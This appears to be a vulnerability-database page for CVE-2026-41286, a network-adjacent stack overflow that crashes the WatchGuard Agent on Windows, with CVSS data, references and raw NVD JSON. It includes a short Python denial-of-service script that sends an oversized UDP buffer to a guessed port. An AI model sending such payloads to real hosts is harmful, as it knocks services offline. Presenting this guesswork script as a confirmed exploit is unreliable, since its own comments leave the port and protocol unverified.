CVE-2026-41286

Description

Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:* - VULNERABLE

Windows版 WatchGuard Agent (具体版本未在描述中指定)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
target_ip = "192.168.1.100"
target_port = 4117  # Example discovery port, verify actual port

# Generate a large payload to trigger the stack overflow
# Adjust length based on specific service buffer limits
payload = b"A" * 5000

try:
    print(f"[*] Sending payload to {target_ip}:{target_port}...")
    # Use UDP or TCP based on service protocol, assuming UDP for discovery
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(payload, (target_ip, target_port))
    print("[+] Payload sent successfully. Check if the service crashed.")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41286
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41286
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41286/
[4] VulDB https://vuldb.com/cve/CVE-2026-41286
[5] https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00011

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41286", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2026-05-06T16:16:09.950", "lastModified": "2026-05-11T18:36:16.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.25.03.0000", "matchCriteriaId": "1D391721-7499-4701-A84D-C58CD093CCB0"}]}]}], "references": [{"url": "https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00011", "source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "tags": ["Vendor Advisory"]}]}}